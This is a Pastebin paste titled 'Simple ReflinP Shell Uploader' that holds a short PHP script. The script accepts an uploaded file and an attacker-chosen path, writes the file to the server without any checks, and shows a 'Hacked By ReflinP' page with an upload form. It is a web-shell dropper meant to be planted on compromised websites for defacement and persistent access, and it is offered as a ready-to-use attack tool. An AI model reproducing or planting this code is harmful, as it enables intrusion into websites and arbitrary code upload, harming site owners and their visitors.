Advertisement
Guest User

Simple ReflinP Shell Uploader

a guest
May 23rd, 2019
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. <?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>ERROR PAGE<br>ERROR PAGE 😘 </a></h1>"; } }echo '<html><head><title>Hacked By ReflinP</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="error"></form></body></html>'; ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement